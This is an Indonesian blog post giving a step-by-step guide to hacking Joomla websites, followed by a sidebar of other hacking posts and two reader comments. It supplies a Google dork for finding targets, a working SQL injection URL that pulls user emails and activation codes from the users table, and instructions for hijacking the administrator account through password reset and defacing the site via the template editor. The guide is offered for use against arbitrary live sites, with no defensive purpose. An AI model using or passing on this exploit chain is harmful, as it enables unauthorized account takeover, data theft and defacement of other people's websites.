• Cara Hack Website Joomla
    H joomla adalah cms yang sekarang adalah merupakan cms yang paling populer, karena untuk mengintegrasi dan menjalankankannya sangat mudah,...
  • Membangun jaringan with DMZ
    Diagram Firewall DMZ Apa itu DMZ itu?   DMZ, atau De-Militarised Zone adalah semacam "Pengorbanan Anak Domba" bagi para hack...
  • membuat shell code sendiri /ilmu hacking
    sore ini dari pada ga ada kerjaan,,nunggu malam untuk nelpon cewek mending kita bikin shell code bareng,,yuk kita maik2 disini,,pertamax......
  • Melakukan setup sebuah Minecraft Server dengan cepet >> 6 step
    Assaalamualaikum war,wab, Baik disini kita akan sama-sama belajar bersama cara untuk melakukan setup server minecraft,, jika belum tahu so...
  • Reset password ubuntu 10.10 ala oz
    Assalamualaikum war, wab, Kemaren ada kasus,, temen lupa password sama username ubuntunya,, padahal itu ubuntu baru diinstal, yah,, kaya...
  • 7 Langkah remote MySQL database server : Liyan oz
    Assalamualaikum war.wab,,, kali ini Liyan bakal coba bahas masalh remote2an,,, remote ???? main RC yuk wuakakaka ah,, males ne ngelantur,...
  • Crack Wifi
    Wireless security auditing application This is a wireless security auditing application that is written in python and uses python-qt4. Thi...
  • 3.5.0 Release Notes Metasploit Statistik
    sorry alnya metasploit yang saya suka yang ini jadi post yang ini aja,,      * Metasploit kini memiliki 613 dan 306 memanfaatkan modul mod...
  • Install psyBNC & Eggdrop di cpanel bug
    kebiasaan hacker hacker kita mencari rooting adalah untuk membuat bot eggdrop atau membuat psybnc. Namun saya beranggapan bhw kebanyakan te...
  • Infect IP using METASPLOIT
    waduh baru kaku juga tangan ne ga nulis...sekarang bakal update lagi ne o2nri2nya,,,ok lanjut... ni tutorial ngebahas tentang gimana cara ...

Cara Hack Website Joomla

Diposkan oleh oz family Sunday, December 12, 2010

H joomla adalah cms yang sekarang adalah merupakan cms yang paling populer, karena untuk mengintegrasi dan menjalankankannya sangat mudah, akan tetapi setiap yang diciptakan pasti ada vulnernya,,so kita belajar bareng yuk,,,
1 / Mencari Exploit Dan Target
Google dork: inurl: "option = com_mytube"
Jenis yang Dork di Google.
[Gambar: sanstitrekhb.png]
2 / Inject Target
Cari url seperti ini:

http://site.com/index.php?&option=com_mytube&Itemid=88..
Sekarang mengganti url seperti ini:
http://site.com/index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat
(0x3a,email,0x3a,activation),13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_use?rs+where+id=62--
Jika situs rentan, Anda bisa melihat sesuatu seperti ini:
[Gambar: sanstitrecen.png]
Kita bisa melihat username, email dan kode aktivasi. (Username: email: kode aktivasi)
Sekarang, biarkan halaman ini terbuka dan membuka halaman baru.
3 / Admin password reset
Pergi ke:
http://www.site.com/index.php?option=com_user&view=reset
Ini adalah standar Joomla! query untuk permintaan ulang sandi
[Gambar: sanstitrely.png]
Ketikkan alamat email yang ditemukan pada langkah 2 dan tekan Kirim.
Kode aktivasi harus resetted.
Kembali ke halaman pertama, me-refresh halaman dan mengambil kode aktivasi baru.
Tempel dia di token dan tekan Kirim.
[Gambar: sanstitregn.png]
4 Login / Admin
Jika Anda melakukan semuanya ok, halaman Password akan memuat. Masukkan password baru anda ...
Setelah itu pergi ke:
http://www.site.com/administrator/
[Gambar: 007pa.png]
Joomla standar sistem manajemen konten portal
Masukkan nama pengguna (ditemukan pada langkah 2) dan password baru Anda, klik Login
Pergi ke Extensions>> Template Manager>> Nama Default Template>> Edit HTML
Dalam Template menyisipkan kode HTML Editor dirusak Anda, klik Terapkan, Simpan dan Anda selesai!
Kredit untuk yopyop ( link asli )

edit post
  1. Web Design Says:
    Posted on August 18, 2012 at 12:04 AM

  2. Bos para master heacker… saya minta coba di tes web ini… http://rapani-id.com/ itu saya bikin dari joomla yang udah dimodifikasi semua sript php nya.. silahkan di tes bos…. saya mau tau kelemahannya….? tapi jangan servernya ya.... hee...e.e. karna server bukan saya yang punya..
    salam.. by rapani Loebis

     
  3. Amir Mirza Says:
    Posted on December 18, 2012 at 11:38 AM

  4. cara mengembalikan yang sudah di hack gimana bos ?

     

Post a Comment